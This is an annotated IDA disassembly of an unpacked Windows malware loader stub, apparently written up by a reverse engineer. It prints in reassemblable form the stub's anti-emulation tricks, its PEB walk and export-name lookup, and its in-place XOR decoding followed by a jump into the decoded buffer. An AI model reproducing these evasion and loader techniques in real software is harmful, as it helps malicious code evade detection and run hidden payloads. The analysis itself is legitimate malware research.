;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer,	std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	4387346EAD6B355D2C5AF1E7B1621E54

; File Name   :	u:\work\4387346ead6b355d2c5af1e7b1621e54_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 00000366 (	870.)
; Section size in file		: 00000366 (	870.)
; Offset to raw	data for section: 00001000
; Flags	60000020: Text Executable Readable
; Alignment	: default

		.686p			; MASM target directives written by IDA: 80686 instruction set,
		.mmx			; MMX extensions, flat 32-bit model — matching the
		.model flat		; "Portable executable for 80386" noted in the header above

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Execute
; Code section (virtual address 401000h, see header). The first sixteen
; bytes are import address table (IAT) slots that the loader overwrites at
; run time; the values shown are whatever the dumped image contained.
; Per the import directory at the end of this section, slot 401000h belongs
; to descriptor 2 (ADVAPI32.dll) and slot 401008h to descriptor 1
; (KERNEL32.dll) — reviewer reading of the PE layout, confirm with a parser.
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
		dd 77DD6FC8h, 0		; IAT slot 401000h — not resolved by IDA; by the import directory it should be ADVAPI32.RegQueryValueExW (hint/name at 1344h)
dword_401008	dd 7C80220Fh, 0	; resolved to->KERNEL32.WriteProcessMemory — IAT slot 401008h; reached only indirectly from sub_401110 through a folded constant (no direct reference)
; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

		public start

;-----------------------------------------------------------------------
; start — PE entry point. Obfuscated unpacking stub (IDA listing, code
; kept byte-for-byte; comments are the reviewer's reading of the visible
; instructions, inferences marked as such).
; Flow:
;   1. sub_401110  — indirect call through the import slot at 401008h
;                    (WriteProcessMemory per IDA) with five zero args.
;   2. fs:[18h]    — Win32 TEB self pointer added to edi.
;   3. sub_4010B0  — exits through a push/retn dispatch into 4010F8h+.
;   4. sub_401130  — fills var_14/var_10 from two image dwords.
;   5. sub_401170  — computes ecx/esi/ebx for the next call's arguments.
;   6. sub_4011E0  — resolves an export via loader structures and calls
;                    it with (esi+ebx, ecx+24C95724h, ebx+0ED9B54AEh, &var_8).
;   7. call ecx    — computed target, 3 args: (ebx, var_10, var_14).
;   8. sub_4012A0  — transfers control to var_14 + 30h (computed call).
; Register inputs: ebx/ecx/edx/esi/edi are never initialised here; the
; constants only fold to sensible addresses if ebx (= edx) is 1264AB92h:
; 2*1264AB92h = 24C95724h (the constant added to ecx before 'call ecx'),
; and 0DB76BA7Ch + 24C95724h wraps to 4011A0h = the unlabeled routine
; after sub_401170, which indeed takes 3 args / retn 0Ch. Reviewer
; inference — confirm in a debugger.
; Frame: 54h bytes of locals; var_1264ABB2 is an IDA artefact of a large
; negative displacement used in the address arithmetic, not a real local.
;-----------------------------------------------------------------------
start		proc near

var_1264ABB2	= byte ptr -1264ABB2h	; artefact: ebp-1264ABB2h is a base for later offset arithmetic
var_18		= byte ptr -18h
var_14		= dword	ptr -14h	; written by sub_401130 (image dword + 400028h); later += 30h and called
var_10		= dword	ptr -10h	; written by sub_401130 (image dword - 28h); byte count for the XOR loop
var_8		= byte ptr -8		; its address is the 4th argument of the resolved API call

		push	ebp
		shl	ecx, 14h		; junk: with the 'shl ecx, 17h' below the total count is >= 32, so ecx becomes 0 — and ecx is overwritten right after the call anyway
		mov	ebp, esp
		sub	esp, 54h
		mov	eax, 0F3C7A752h		; sub_401110 adds 0C7868B6h: wraps to 00401008h = dword_401008 (import slot)
		shl	ecx, 17h
		call	sub_401110		; calls [401008h] with five zero arguments; eax/ecx/edx are whatever that call left
		mov	ecx, edx		; ecx = edx
		add	edx, 23h		; edx += 23h
		xor	eax, eax		; dead store: eax is rewritten below before any read
		neg	ecx			; ecx = -edx_old
		sub	ecx, 0Dh		; ecx = -edx_old - 0Dh  =>  edx + ecx + 2 == 18h for any edx
		mov	esi, edi		; esi = entry edi (input to sub_4010B0, which leaves esi = -entry edi)
		mov	eax, 0AED2CE83h		; input to sub_4010B0
		add	edi, fs:[edx+ecx+2]	; edi += fs:[18h] — linear address of the current TEB (Win32); the register pair only hides the constant 18h
		lea	ecx, [ebp+var_1264ABB2]	; ecx = ebp - 1264ABB2h
		push	ecx			; single stack argument of sub_4010B0 (consumed by the 'retn 4' at 401100h when the dispatch lands at 4010F9h)
		call	sub_4010B0		; exits via push/retn dispatch into the bytes at 4010F8h; see that routine
		lea	ecx, [ebp+var_18]
		lea	eax, [ebp+var_14]
		add	ecx, 8			; ecx = &var_10 (var_18 + 8)
		push	ecx			; arg_4 = &var_10
		push	eax			; arg_0 = &var_14
		call	sub_401130		; stdcall, retn 8: writes *arg_4 and *arg_0
		call	sub_401170		; no stack args: ebx = edx, esi/ecx = folded values (see routine)
		lea	eax, [ebp+var_8]
		push	eax			; arg 4: &var_8
		shl	edx, 1			; edx *= 2 — not read again before being overwritten (sub_401220 and the 4011A0h routine write edx)
		mov	eax, ebx
		add	eax, 0ED9B54AEh		; arg 3: ebx + 0ED9B54AEh — 40h if ebx = 1264AB92h (reviewer: consistent with PAGE_EXECUTE_READWRITE for a VirtualProtect-style call; the callee is chosen at run time in sub_401220 — confirm)
		push	eax
		add	ecx, 24C95724h		; arg 2: ecx + 24C95724h (undoes the -2*edx applied in sub_401170 when edx = 1264AB92h)
		push	ecx
		add	esi, ebx		; arg 1: sub_401170's esi + ebx (reviewer: 400000h, the image base, for edx = 1264AB92h)
		push	esi
		mov	ecx, ebx		; ecx = key constant for sub_401220's address arithmetic
		call	sub_4011E0		; resolves an export and calls it with the four args above; the callee is expected to pop them (stdcall) — see sub_4011E0
		push	ebx			; arg 3 of the computed call (lands at [ebp+10h] there; that routine takes the same value from ebx instead)
		lea	eax, ds:0DB76BA7Ch	; eax = 0DB76BA7Ch (lea of an absolute address == mov)
		lea	ecx, [eax+ebx*2]	; ecx = 0DB76BA7Ch + 2*ebx — 4011A0h if ebx = 1264AB92h (reviewer)
		push	[ebp+var_10]		; arg 2: byte count
		push	[ebp+var_14]		; arg 1: buffer pointer
		call	ecx			; computed target; the routine at 4011A0h XOR-decodes the buffer in place, leaves esi = ebx, and does 'retn 0Ch'
		mov	ecx, 1264B78Ch
		push	ecx			; 2nd arg of sub_4012A0 (read there through a folded [ebp+0Ch])
		lea	eax, [ebp+var_14]
		push	eax			; 1st arg: &var_14
		mov	eax, 30h		; added to var_14 inside sub_4012A0
		call	sub_4012A0		; ends with a computed call to var_14 + 30h; if that returns, sub_4012A0 returns here
		leave
		retn				; back to the loader — only reached if the decoded code returns
start		endp

; ---------------------------------------------------------------------------
		dw 58Dh			; six bytes after start, not reached by the code above; reviewer: 8D 05 + the dword below would decode as 'lea eax, ds:401008h' (the import slot) if anything jumped here — no visible reference does
		dd offset dword_401008
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


;-----------------------------------------------------------------------
; sub_4010B0 — computed-dispatch routine. IDA reports "sp-analysis
; failed" because it never executes its own 'retn': it ends with
; push eax / retn, an indirect jump to byte_4010F8 + (selected byte & 0Fh).
; In:   eax = 0AED2CE83h, esi = start's entry edi, edi = entry edi + TEB,
;       [esp+4] = ebp-1264ABB2h (the caller's pointer argument).
; Out:  edx = 1264AAA1h + selected byte  (= -(eax + 3EC886DCh) + byte);
;       edi = TEB - edx; esi = -entry edi; ebx = byte_4010F8; eax/ecx scratch.
; The selected byte: reviewer arithmetic gives esi+edi-54F8F6h+(15413A8h>>2)
;       = TEB + 0BF4h; the dword read at [TEB+0BF1h] shifted right by 18h is
;       the byte at TEB+0BF4h (x86 TEB.LastStatusValue, low byte). Its low
;       nibble chooses the dispatch offset: 0 = the int3 at 4010F8h,
;       1 = the clean store/return path at 4010F9h, others land
;       mid-instruction. sub_401200's address arithmetic only lines up when
;       this byte is 0F1h (an NTSTATUS such as STATUS_INVALID_PARAMETER_3),
;       i.e. the stub depends on the exact status left by the failed API
;       call in sub_401110 — looks like anti-emulation; confirm by tracing.
;-----------------------------------------------------------------------
sub_4010B0	proc near		; CODE XREF: start+35p
		push	ebp
		mov	ebp, esp
		mov	ebx, eax		; dead store (ebx rewritten two lines down)
		mov	ecx, 12h		; dead store (ecx zeroed three lines down)
		mov	ebx, 15413A8h
		add	eax, 3EC886DCh		; eax = 0ED9B555Fh for the documented input
		xor	ecx, ecx		; dead store (ecx rewritten by the lea below)
		shr	ebx, 2			; ebx = 5504EAh
		neg	esi			; esi = -entry_edi
		push	esi
		lea	esi, [esi+edi-54F8F6h]	; esi = TEB - 54F8F6h  (the entry edi cancels out)
		neg	eax			; eax = 1264AAA1h
		lea	ecx, [esi+ebx]		; ecx = TEB + 0BF4h
		xor	edx, edx		; dead store
		pop	esi			; esi = -entry_edi again
		add	edi, esi		; edi = TEB
		mov	edx, eax		; edx = 1264AAA1h
		mov	ecx, [ecx-3]		; dword covering TEB+0BF1h..0BF4h
		shr	ecx, 18h		; keep its top byte = the byte at TEB+0BF4h
		mov	eax, ecx
		add	edx, ecx		; edx = 1264AAA1h + byte  (stored into the caller's frame by the code at 4010FCh)
		lea	ebx, byte_4010F8	; dispatch base
		sub	edi, edx		; edi = TEB - edx  (consumed later by sub_401200)
		and	eax, 0Fh		; dispatch index = low nibble of the byte
		add	eax, ebx
		push	eax
		retn				; jmp byte_4010F8 + index — control never returns to this frame's caller from here
sub_4010B0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; Dispatch targets for sub_4010B0's 'push eax / retn' (byte_4010F8 + 0..0Fh).
; Only the path entered at 4010F9h returns cleanly to start (leave / retn 4);
; entering at 4010F8h executes int3, entering at 401100h would use the saved
; ebp as a return address, other offsets start mid-instruction (reviewer
; reading of the byte layout — confirm).
byte_4010F8	db 0CCh			; DATA XREF: sub_4010B0+39o — 0CCh = int3: a breakpoint trap if the dispatch index is 0 (likely anti-debug/anti-emulation; inference)
; ---------------------------------------------------------------------------
		mov	ecx, [ebp+8]		; 4010F9h: ecx = pointer argument passed by start (ebp_start - 1264ABB2h)
		mov	[ecx+edx], edx		; store edx (1264AAA1h + TEB byte) at pointer + edx = ebp_start - 111h + byte (reviewer arithmetic; ebp_start - 20h for byte 0F1h, inside start's frame)
		leave				; drops sub_4010B0's frame
		retn	4			; back to start, popping the pointer argument
; ---------------------------------------------------------------------------
		db 8Dh				; 8D 05 00 10 40 00 would decode as 'lea eax, ds:401000h' (reviewer); followed by 0CCh filler
		dd 40100005h, 0CCCCCC00h, 0CCCCCCCCh

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


;-----------------------------------------------------------------------
; sub_401110 — disguised call through an import slot.
; In:   eax = 0F3C7A752h (from start): eax + 0C7868B6h wraps to 00401008h,
;       the IAT slot IDA annotates as KERNEL32.WriteProcessMemory.
; Does: pushes five zero dwords (ecx = 0, edx = ecx = 0, ecx<<2 = 0, 0, 0)
;       and calls [eax]. With WriteProcessMemory that is
;       WriteProcessMemory(0, 0, 0, 0, 0): a NULL-handle call that is
;       expected to fail. The caller then consumes what it leaves behind
;       (edx, and via sub_4010B0 a TEB status byte) — reviewer inference.
; Out:  eax = callee's return value; ecx/edx whatever the callee left.
;       (API identity is IDA's annotation of a dumped IAT value — confirm.)
;-----------------------------------------------------------------------
sub_401110	proc near		; CODE XREF: start+11p
		push	ebp
		mov	ebp, esp
		add	eax, 0C7868B6h		; eax = 00401008h for the documented input
		xor	ecx, ecx		; ecx = 0
		mov	edx, ecx		; edx = 0
		shl	ecx, 2			; still 0
		push	ecx			; arg 5 = 0
		push	edx			; arg 4 = 0
		push	edx			; arg 3 = 0
		push	0			; arg 2 = 0
		push	0			; arg 1 = 0
		call	dword ptr [eax]		; call [401008h]; 'leave' below restores esp whatever the callee pops
		leave
		retn
sub_401110	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


;-----------------------------------------------------------------------
; sub_401130(arg_0 = dword*, arg_4 = dword*) — stdcall, retn 8.
; In:   edx as left by start (not set here).
; Does: *arg_4 = [0DB76C928h + 2*edx] - 28h      (0FFFFFFD8h == -28h)
;       *arg_0 = [0DB76C924h + 2*edx] + 400028h  (400000h = image base, see header)
;       i.e. two adjacent image dwords read from an edx-dependent address;
;       the second becomes an image-based pointer, the first a length.
; Reviewer: with edx = 1264AB92h the reads are [40204Ch] and [402048h],
;       inside section 2, which this listing does not include — confirm.
; Clobbers: eax, ecx, ebx (not preserved), flags.
;-----------------------------------------------------------------------
sub_401130	proc near		; CODE XREF: start+45p

arg_0		= dword	ptr  8		; receives [..-4] + 400028h  (start passes &var_14)
arg_4		= dword	ptr  0Ch	; receives [..] - 28h        (start passes &var_10)

		push	ebp
		mov	ebp, esp
		mov	eax, 4
		shl	eax, 14h		; eax = 400000h (image base)
		push	eax			; kept for the final add
		sub	eax, edx		; eax = 400000h - edx
		mov	ecx, 0DB36C928h
		lea	ecx, [ecx+edx*2]	; ecx = 0DB36C928h + 2*edx
		add	eax, ecx		; eax = 0DB76C928h + edx
		mov	ecx, 0FFFFFFD8h		; -28h
		add	ecx, [eax+edx]		; ecx = [0DB76C928h + 2*edx] - 28h
		mov	ebx, [ebp+arg_4]
		mov	[ebx], ecx		; *arg_4 = length-like value
		sub	eax, 4			; previous dword
		mov	ebx, [ebp+arg_0]
		mov	ecx, [eax+edx]		; ecx = [0DB76C924h + 2*edx]
		pop	eax			; eax = 400000h
		add	eax, 28h		; eax = 400028h
		add	ecx, eax		; ecx = dword + 400028h
		mov	[ebx], ecx		; *arg_0 = pointer-like value
		leave
		retn	8
sub_401130	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


;-----------------------------------------------------------------------
; sub_401170 — no stack args; computes three register values for start.
; In:   edx as left by the previous calls.
; Out:  ebx = edx
;       esi = ((0ED9B548Eh + edx) << 11h) + 0ED9B546Eh
;       ecx = [esi + edx + 0E0h] - 2*edx
; Reviewer (assuming edx = 1264AB92h): 0ED9B548Eh + edx wraps to 20h,
;       << 11h gives 400000h, so esi = 0EDDB546Eh and esi + edx + 0E0h
;       wraps to 4000E0h — a dword inside the PE header at the image base
;       (which field depends on e_lfanew). start then adds 24C95724h back to
;       ecx (giving that dword) and ebx to esi (giving 400000h). Confirm.
;-----------------------------------------------------------------------
sub_401170	proc near		; CODE XREF: start+4Ap
		push	ebp
		mov	ebp, esp
		mov	ebx, edx		; ebx = edx (start uses ebx as its base value from here on)
		mov	esi, 0ED9B548Eh
		add	esi, edx
		shl	esi, 11h		; shift discards the high 17 bits of the sum
		add	esi, 0ED9B546Eh
		lea	ecx, [edx+edx]		; ecx = 2*edx
		neg	ecx			; ecx = -2*edx
		add	ecx, [esi+edx+0E0h]	; ecx = dword at the folded address - 2*edx
		leave
		retn
sub_401170	endp

; ---------------------------------------------------------------------------
		align 10h
;-----------------------------------------------------------------------
; Unlabeled routine at 4011A0h (IDA created no proc: its only caller is
; start's computed 'call ecx'). stdcall with three dword args, retn 0Ch:
;   [ebp+8]    buffer pointer  (start passes var_14)
;   [ebp+0Ch]  byte count      (start passes var_10; tested as signed)
;   [ebp+10h]  ebx value       (pushed by start; never read by address —
;                               the same value is taken from ebx via push/pop)
; Does: in-place XOR decoding of the buffer, one dword per iteration:
;   key = 0C1E7D26h; loop { [ptr] ^= key; count -= 4; if count <= 0 stop;
;   key += edx + esi; key += 0FAA8B13Ch; ptr = ptr - 1264AB8Eh + esi;
;   edx = -edx } with edx starting at 2, so the first key term alternates
;   esi+2, esi-2, ...  At least one dword is decoded before the count test.
; Reviewer: the pointer advance is +4 only if esi (= ebx at entry) is
;   1264AB92h. esi is left equal to ebx on return; sub_4012A0 later relies
;   on that value. Confirm.
; Clobbers: eax, ecx, edx, esi, edi, ebx (none preserved).
;-----------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch		; locals; only [ebp-4] is used
		push	ebx
		mov	ecx, [ebp+0Ch]		; ecx = byte count
		pop	esi			; esi = ebx (entry value)
		mov	ebx, [ebp+8]		; ebx = buffer pointer
		mov	edx, 3
		mov	eax, 0C1E7D26h		; initial XOR key
		mov	dword ptr [ebp-4], 0FAA8B13Ch	; per-iteration key increment
		dec	edx			; edx = 2


loc_4011C0:				; CODE XREF: .text:004011D9j
		xor	[ebx], eax		; decode one dword
		sub	ecx, 4
		jle	short locret_4011DB	; signed test: stop when count <= 0
		lea	edi, [edx+esi]		; edi = esi +/- 2
		add	eax, edi		; key += edi
		add	eax, [ebp-4]		; key += 0FAA8B13Ch
		lea	ebx, [ebx-1264AB8Eh]
		add	ebx, esi		; ptr += esi - 1264AB8Eh  (== +4 when esi = 1264AB92h)
		neg	edx			; flip the +/-2 term
		jmp	short loc_4011C0
; ---------------------------------------------------------------------------

locret_4011DB:				; CODE XREF: .text:004011C5j
		leave
		retn	0Ch			; pops the three arguments
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



;-----------------------------------------------------------------------
; sub_4011E0 — resolve an export at run time and call it with the four
; arguments start pushed. IDA: "sp-analysis failed", caused by the
; return-address juggling below.
; In:   ecx = key constant (start's ebx); edi/eax as left by start;
;       stack: [ret][a1][a2][a3][a4].
; Does: sub_401200 -> eax = a module base (loader-structure chase);
;       sub_401220 -> eax = address of one export of that module
;                     (clobbers eb x, leaves ecx intact);
;       mov ebx, ecx  restores ebx to the key constant start needs later;
;       pop esi       lifts this routine's own return address so the target
;                     sees a1..a4 directly above its own return address;
;       call eax      the resolved routine — it must pop its four args
;                     (stdcall) and preserve esi for the next two lines;
;       push esi / retn  resume in start.
; Out:  eax = return value of the resolved routine; ebx = key constant;
;       esi = this routine's return address (not restored).
;-----------------------------------------------------------------------
sub_4011E0	proc near		; CODE XREF: start+69p
		call	sub_401200		; eax = module base (see routine)
		call	sub_401220		; eax = export address; ebx clobbered, ecx untouched
		mov	ebx, ecx		; ebx = key constant again (start reads ebx after this call)
		pop	esi			; esi = own return address; [esp] is now a1
		call	eax			; resolved routine, four args on the stack
		push	esi			; put the return address back
		retn				; return to start
sub_4011E0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



;-----------------------------------------------------------------------
; sub_401200 — five-level pointer chase, no frame, clobbers only eax:
;   eax = [[[[[edi + ecx + 30h] + 0Ch] + 1Ch] + 0] + 8]
; (the lea/mov displacements -512D323Eh and +512D326Eh cancel to +30h.)
; Reviewer: if edi + ecx is the TEB address, the chain is TEB+30h = PEB
; -> PEB.Ldr (+0Ch) -> InInitializationOrderModuleList.Flink (+1Ch) ->
; first LDR entry -> DllBase (+8): the base of the first DLL in
; initialisation order, obtained without the import table. With start's
; values edi = TEB - (1264AAA1h + b) and ecx = 1264AB92h, edi + ecx + 30h
; equals TEB + 30h exactly when the TEB byte b selected in sub_4010B0 is
; 0F1h. Confirm by tracing; this is why the static imports understate
; what the sample does.
;-----------------------------------------------------------------------
sub_401200	proc near		; CODE XREF: sub_4011E0p
		lea	eax, [edi+ecx-512D323Eh]
		mov	eax, [eax+512D326Eh]	; eax = [edi+ecx+30h]
		mov	eax, [eax+0Ch]		; +0Ch
		mov	eax, [eax+1Ch]		; +1Ch
		mov	eax, [eax]		; first list entry
		mov	eax, [eax+8]		; +8
		retn
sub_401200	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


;-----------------------------------------------------------------------
; sub_401220 — look up one export of the module at eax by scanning its
; export name table for a 4-byte tag at a fixed offset in each name.
; In:   eax = module base (from sub_401200); ecx = key constant (start's
;       ebx, assumed 1264AB92h in the folded values below — reviewer).
; Out:  eax = virtual address of the matching export; ebx = module base;
;       esi = AddressOfNames VA; edi = AddressOfFunctions VA + match offset;
;       edx scratch; ecx untouched; 8-byte frame, var_8 = byte index.
; Folded addresses (all reviewer arithmetic, confirm):
;   ebx - 24C956E8h + 2*ecx           = base + 3Ch   (loaded, then discarded)
;   ebx + (2*ecx + 0ED9B54AAh) - ecx  = base + 3Ch   -> e_lfanew -> PE header
;   PE header - 1264AB1Ah + ecx       = PE + 78h     -> export directory RVA
;   export dir + 20h / + 1Ch          = AddressOfNames / AddressOfFunctions
;   ebp + 1264AB8Eh - ecx             = ebp - 4      <- tag 68651FF5h - ecx
;                                       (= 56007463h: ASCII 'c','t',0,'V')
;   name VA = base + RVA - 1264AB86h; the compared dword is at
;   name + ecx - 1264AB86h = name + 0Ch
; The tag matches a name whose bytes 0Ch..0Fh are "ct",0 followed by a
; name starting with 'V' — consistent with kernel32's sorted table where
; "VirtualProtect" precedes "VirtualProtectEx" (inference; pair with the
; 40h argument start passes to the resolved routine).
; The loop has no upper bound: if nothing matches it reads past the table.
; The function address is taken at the same byte index as the name
; (AddressOfNameOrdinals is skipped), which is only right when the ordinal
; table is the identity — an assumption about the target DLL (inference).
; IDA's var_24C95728 / arg_1264AB86 are artefacts of these displacements.
;-----------------------------------------------------------------------
sub_401220	proc near		; CODE XREF: sub_4011E0+5p

var_24C95728	= byte ptr -24C95728h	; artefact: ebp-24C95728h + 2*ecx == ebp-4
var_8		= dword	ptr -8		; byte offset into AddressOfNames / AddressOfFunctions
arg_1264AB86	= byte ptr  1264AB8Eh	; artefact: ebp+1264AB8Eh - ecx == ebp-4

		push	ebp
		mov	ebp, esp
		sub	esp, 8
		mov	ebx, eax		; ebx = module base
		mov	eax, ecx		; eax = key
		lea	esi, [ebx-24C956E8h]
		shl	eax, 1			; eax = 2*key
		mov	esi, [esi+eax]		; esi = [base+3Ch] — dead load, overwritten three lines down
		add	eax, 0ED9B54AAh		; eax = 2*key + 0ED9B54AAh
		lea	esi, [ebx+eax]
		sub	esi, ecx		; esi = base + 3Ch
		mov	esi, [esi]		; e_lfanew
		add	esi, ebx		; esi = PE header
		lea	esi, [esi-1264AB1Ah]
		mov	esi, [esi+ecx]		; esi = [PE+78h] = export directory RVA
		add	esi, ebx		; esi = export directory VA
		lea	edx, [esi+20h]
		mov	esi, [edx]		; AddressOfNames RVA
		add	esi, ebx		; esi = AddressOfNames VA
		sub	edx, 4			; edx = &AddressOfFunctions
		mov	edi, [edx]
		add	edi, ebx		; edi = AddressOfFunctions VA
		mov	edx, 68651FF5h
		lea	eax, [ebp+arg_1264AB86]
		sub	edx, ecx		; edx = tag (56007463h for the assumed key)
		sub	eax, ecx		; eax = ebp-4
		mov	[eax], edx		; [ebp-4] = tag
		xor	edx, edx
		mov	[ebp+var_8], edx	; var_8 = 0


loc_401272:				; CODE XREF: sub_401220+74j
		mov	edx, [ebp+var_8]
		lea	eax, [esi+edx]
		mov	eax, [eax]		; name RVA
		add	eax, ebx
		lea	eax, [eax-1264AB86h]	; name VA - 1264AB86h
		lea	edx, [ebp+var_24C95728]
		mov	edx, [edx+ecx*2]	; edx = [ebp-4] = tag
		cmp	edx, [eax+ecx]		; compare with the dword at name + 0Ch
		jz	short loc_401296
		add	[ebp+var_8], 4		; next name (no end-of-table check)
		jmp	short loc_401272
; ---------------------------------------------------------------------------


loc_401296:				; CODE XREF: sub_401220+6Ej
		add	edi, [ebp+var_8]	; AddressOfFunctions + the same byte index
		mov	eax, [edi]		; function RVA
		add	eax, ebx		; eax = function VA
		leave
		retn
sub_401220	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


;-----------------------------------------------------------------------
; sub_4012A0(arg_0 = dword*, [ebp+0Ch] = second dword) — stdcall, retn 8.
; In:   eax = 30h; arg_0 = &var_14 of start; second arg = 1264B78Ch;
;       esi as left by the routine at 4011A0h (it sets esi = ebx).
; Does: *arg_0 += eax;
;       edx = [ebp + esi + 0ED9B547Ah] + *arg_0 - esi, pushed — the single
;       argument the target will see;
;       stores *arg_0 at esp-4 (through the folded esp+4+1264AB8Eh-esi-4)
;       and then 'call [esp-4]' — i.e. calls *arg_0 (var_14 + 30h), the
;       buffer decoded by the previous call.
; Reviewer: the two folded offsets line up only if esi = 1264AB92h; then
;       [ebp+esi+0ED9B547Ah] is [ebp+0Ch] (the second argument) and the
;       callee's argument is *arg_0 + 0BFAh (after the += 30h). The slot
;       below esp is written and immediately read by the call; anything
;       touching memory below the stack pointer in between would break the
;       transfer. Confirm in a debugger.
; Out:  whatever the called code leaves; returns here only if it returns.
;-----------------------------------------------------------------------
sub_4012A0	proc near		; CODE XREF: start+8Fp

var_8		= dword	ptr -8		; artefact: [esp+4+var_8] is [esp-4], below the stack pointer
arg_0		= dword	ptr  8		; pointer to start's var_14
arg_1264AB86	= byte ptr  1264AB8Eh	; artefact: esp+4+1264AB8Eh-esi-4 == esp-4 when esi = 1264AB92h

		push	ebp
		mov	ebp, esp
		mov	ecx, 0ED9B546Eh
		lea	ecx, [ecx+esi+0Ch]	; ecx = esi + 0ED9B547Ah (== 0Ch for esi = 1264AB92h)
		mov	edx, [ebp+ecx+0]	; edx = [ebp+0Ch] for that esi: the second stack argument
		mov	ebx, [ebp+arg_0]
		add	[ebx], eax		; *arg_0 += 30h
		add	edx, [ebx]		; edx += *arg_0
		sub	edx, esi		; edx -= esi  -> *arg_0 + 0BFAh for the assumed values
		neg	esi			; esi = -esi
		push	edx			; becomes the callee's first argument
		lea	eax, [esp+4+arg_1264AB86]	; eax = esp + 1264AB92h
		mov	ecx, [ebx]		; ecx = *arg_0 (the target address)
		mov	[eax+esi-4], ecx	; [esp-4] = target
		call	[esp+4+var_8]		; call [esp-4]: transfer to *arg_0 (decoded buffer + 30h)
		leave
		retn	8
sub_4012A0	endp

; ---------------------------------------------------------------------------
		align 4
; Import directory — two IMAGE_IMPORT_DESCRIPTORs (5 dwords each) plus the
; zero terminator, followed by the import-name-table thunks and the
; hint/name strings. Decoded by the reviewer from the PE layout; confirm
; with a PE parser. Only WriteProcessMemory and RegQueryValueExW are
; imported statically; the stub resolves what it really needs at run time
; (sub_401200 / sub_401220), so this table understates its behaviour.
		dd 1318h, 2 dup(0)	; descr 1: OriginalFirstThunk = 1318h, TimeDateStamp = 0, ForwarderChain = 0
		dd 1336h, 1008h, 1310h,	2 dup(0)	; descr 1: Name = 1336h ("KERNEL32.dll"), FirstThunk = 1008h (dword_401008); descr 2: OriginalFirstThunk = 1310h, 0, 0
		dd 1358h, 1000h, 5 dup(0)	; descr 2: Name = 1358h ("ADVAPI32.dll"), FirstThunk = 1000h (the unresolved slot at 401000h); then the all-zero terminator
		dd 1344h, 0		; INT for descr 2 (at 1310h): hint/name entry at 1344h
		dd 1320h, 0		; INT for descr 1 (at 1318h): hint/name entry at 1320h
		db 0ADh	; hint word 03ADh, low byte (IDA split the IMAGE_IMPORT_BY_NAME entry)
		db 3, 57h, 72h		; hint high byte, then 'W','r' of "WriteProcessMemory"
aIteprocessmemo	db 'iteProcessMemory',0	; rest of that name
		align 2
aKernel32_dll	db 'KERNEL32.dll',0	; at 1336h
		align 4
		dd 655201F8h, 65755167h, 61567972h, 4565756Ch, 5778h, 41564441h	; at 1344h: hint 01F8h, "RegQueryValueExW",0, pad, then "ADVA"
		dd 32334950h, 6C6C642Eh	; "PI32.dll" — "ADVAPI32.dll" starts at 1358h
		db 2 dup(0)
		dw ?
		dd 26h dup(?)		; uninitialised tail of the section
_text		ends

; Section 3. (virtual address 00007000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 00006E00
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
; Section 3 (virtual address 7000h): read/write data. The listing shows no
; initialised bytes for it, only alignment padding up to its 1000h-byte
; virtual size. Note the listing jumps from Section 1 straight to
; Section 3: Section 2 is not included.
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 407000h
		align 2000h		; pads 407000h..408000h — the whole section, no data
_idata2		ends


		end start		; module end; program entry point = start